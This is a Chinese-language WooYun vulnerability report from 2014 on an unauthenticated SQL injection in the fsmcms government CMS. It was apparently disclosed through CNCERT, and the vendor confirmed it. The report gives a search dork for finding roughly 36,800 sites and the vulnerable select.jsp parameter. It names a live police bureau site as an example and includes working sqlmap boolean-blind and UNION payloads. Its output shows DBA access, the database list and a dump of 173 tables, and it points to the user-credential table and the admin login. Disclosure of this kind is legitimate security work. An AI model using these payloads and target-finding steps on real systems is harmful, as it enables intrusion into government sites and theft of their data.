当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-061675

漏洞标题:某政府通用型cms前台注入一枚(一些公安信访网站中招)

相关厂商:fsmcms

漏洞作者: Haswell

提交时间:2014-05-22 23:15

修复时间:2014-08-20 23:16

公开时间:2014-08-20 23:16

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-05-22: 细节已通知厂商并且等待厂商处理中
2014-05-27: 厂商已经确认,细节仅向厂商公开
2014-05-30: 细节向第三方安全合作伙伴开放
2014-07-21: 细节向核心白帽子及相关领域专家公开
2014-07-31: 细节向普通白帽子公开
2014-08-10: 细节向实习白帽子公开
2014-08-20: 细节向公众公开

简要描述:


前台一枚注入,无需登录,大多为dba。

详细说明:

fsmcms,inurl:fsmcms 一下找到约 36,800 条结果
注入处:

/fsmcms/sites/main/select.jsp?select_value=


盲注与union查询注入
例如包头市公安局:btgaj.gov.cn/fsmcms/sites/main/select.jsp?select_value=FJ_QS 

---
Place: GET
Parameter: select_value
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: select_value=FJ_QS' AND 2255=2255 AND 'Llbb'='Llbb
    Type: UNION query
    Title: Generic UNION query (NULL) - 29 columns
    Payload: select_value=FJ_QS' UNION ALL SELECT CHR(113)||CHR(105)||CHR(114)||CHR(115)||CHR(113)||CHR(97)||CHR(65)||CHR(119)||CHR(113)||CHR(119)||CHR(77)||CHR(117)||CHR(111)||CHR(79)||CHR(82)||CHR(113)||CHR(117)||CHR(120)||CHR(114)||CHR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM DUAL-- 
---
web application technology: JSP
back-end DBMS: Oracle
current user is DBA:    True


列库:

[*] CTXSYS
[*] DBSNMP
[*] DMSYS
[*] EXFSYS
[*] FSM_CMS
[*] HITEKEP
[*] MDSYS
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] SCOTT
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TSMSYS
[*] WMSYS
[*] XDB


FSM_CMS中P_USER表中有用户信息,然后fsmcms/adminindex.jsp管理员登陆
因为是通用型没有尝试后台拿shell

漏洞证明:

Database: FSM_CMS
[173 tables]
+--------------------------------+
| CAMS_ITEM                      |
| CAMS_NEWS_HISTORY              |
| KEBIAO                         |
| P_ACCESSLOG                    |
| P_ACCESSLOG_201211             |
| P_ACCESSLOG_201301             |
| P_ACCESSLOG_201302             |
| P_ACCESSLOG_201303             |
| P_ACCESSLOG_201304             |
| P_ACCESSLOG_201305             |
| P_ACCESSLOG_201306             |
| P_ACCESSLOG_201307             |
| P_ACCESSLOG_201308             |
| P_ACCESSLOG_201309             |
| P_ACCESSLOG_201310             |
| P_ACCESSLOG_201311             |
| P_ACCESSLOG_201312             |
| P_ACCESSLOG_201401             |
| P_ACCESSLOG_201402             |
| P_ACCESSLOG_201403             |
| P_ACCESSLOG_201404             |
| P_ACCESSLOG_201405             |
| P_ACCESS_DAY                   |
| P_ADCOLUMN                     |
| P_ADINFOCONTENT                |
| P_ADPIC                        |
| P_ADTEMPLATE                   |
| P_ADWEB                        |
| P_ADWEBPUBLISH                 |
| P_AGENT                        |
| P_AGENTDEFAULTWEB              |
| P_AGENTROLE                    |
| P_AGENTWEB                     |
| P_BACKUP                       |
| P_CALENDAR                     |
| P_CHILDWEB                     |
| P_COLLECTMAGAZINE              |
| P_COLNAVIGATION                |
| P_COLUMN                       |
| P_COLUMNPERMISSIONS            |
| P_COLUMNTEMPLATE               |
| P_COLUMNTOINFO                 |
| P_COLUMNVISIBLE                |
| P_COLUMNWELCOMEINFO            |
| P_CONTRIBUTE                   |
| P_CONTRIBUTE_COLUMN            |
| P_CRITIC                       |
| P_CUSTOMFIELD                  |
| P_CUSTOMFIELD_VALUE            |
| P_DEALDEPART                   |
| P_DEPT                         |
| P_DEPTDUTY                     |
| P_DEPTGROUP                    |
| P_DEPTGROUPLINK                |
| P_DEPTNODEAGENT                |
| P_DIR                          |
| P_DOC                          |
| P_DOWNLOAD                     |
| P_DUTY_ARRANGE                 |
| P_EMAIL                        |
| P_FILE                         |
| P_FILESIGN                     |
| P_FILESIGNRESULT               |
| P_FLOW                         |
| P_GNUM                         |
| P_GROUP                        |
| P_HOTSPOT                      |
| P_INDEXTEMPLET                 |
| P_INFO                         |
| P_INFOBROWSE                   |
| P_INFOBROWSEDAY                |
| P_INFOCOMMENT                  |
| P_INFOSEND                     |
| P_INFOSHARE                    |
| P_INFOSHAREAUTO                |
| P_INFOSOURCE                   |
| P_INFOTAG                      |
| P_INFOTOINFO                   |
| P_INTEGRALDETAIL               |
| P_INTERVIEW                    |
| P_INTERVIEW_PIC                |
| P_INTERVIEW_QUESTION           |
| P_IP                           |
| P_ISSUEMAGAZINE                |
| P_JOB                          |
| P_KEYS                         |
| P_LEADERMAIL                   |
| P_LEADERMAIL1                  |
| P_LINK                         |
| P_LOB_FILE                     |
| P_LOB_TEXT                     |
| P_LOGCATEGORY                  |
| P_LOGINFO                      |
| P_LOGINNUM                     |
| P_MAGASERIALCOL                |
| P_MAGAZINE                     |
| P_MAGAZINECOLUMN               |
| P_MAGAZINEINFO                 |
| P_MAIL                         |
| P_MAIL_ATTACH                  |
| P_MENU                         |
| P_MESSAGEBOARD                 |
| P_MESSAGE_TYPE                 |
| P_NAVIGATION                   |
| P_NODE                         |
| P_NODEAGENT                    |
| P_OPERATECODE                  |
| P_OTHERWEB                     |
| P_PERSONWEB                    |
| P_POR_MODULECONFIG             |
| P_POR_MODULELAYOUT             |
| P_POR_MODULES                  |
| P_POR_PERMISSION               |
| P_POR_USER                     |
| P_PRIVATEADDRESS               |
| P_PROGRAMTEMPLET               |
| P_PUBLICADDRESS                |
| P_PUBLISH_QUEUE                |
| P_PV                           |
| P_QNERESULT                    |
| P_QUESTIONFIELD                |
| P_QUESTIONS                    |
| P_QUESTIONTABLE                |
| P_QUESTION_REPLY               |
| P_RECIPIENT                    |
| P_REGMEMBER                    |
| P_RELEASEROLE                  |
| P_REMINDER                     |
| P_REMOTEHOST                   |
| P_REPLY                        |
| P_RESEARCH                     |
| P_RESOPTION                    |
| P_RESRESULT                    |
| P_RESUME                       |
| P_REVERTMB                     |
| P_ROLE                         |
| P_ROLEMENU                     |
| P_ROLEWEB                      |
| P_SHAREHOST                    |
| P_SITEACCESSLOG                |
| P_SITETEMPLATE                 |
| P_STATIC_QUEUE                 |
| P_TABLE                        |
| P_TABLEFIELD                   |
| P_TABLEPROGRAM                 |
| P_TABOO                        |
| P_TEMP                         |
| P_TEMPDESIGN                   |
| P_TEMPINCLUDE                  |
| P_TEMPLET                      |
| P_TEMPWEB                      |
| P_TODO                         |
| P_TOPIC                        |
| P_TOPICQUESTIONS               |
| P_USER                         |
| P_USERDEPT                     |
| P_USERGROUP                    |
| P_USERINTEGRAL                 |
| P_VIDEO                        |
| P_WEB                          |
| P_WEBCOPYRIGHT                 |
| P_WEBTITLE                     |
| P_WEIBO                        |
| P_WFCONFIG                     |
| P_WFHISTORY                    |
| P_WFINSTANCE                   |
| P_WORKFLOW                     |
| P_WORKFLOWDETAIL               |
| P_WORKLOG                      |
| P_WORKPLAN                     |
| P_WORKREVIEW                   |
| STUDENT                        |
| SYS_SECURITY_TOKEN             |
+--------------------------------+


修复方案:

修补一下

版权声明:转载请注明来源 Haswell@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:13

确认时间:2014-05-27 13:53

厂商回复:

CNVD确认并复现所述情况。

最新状态:

暂无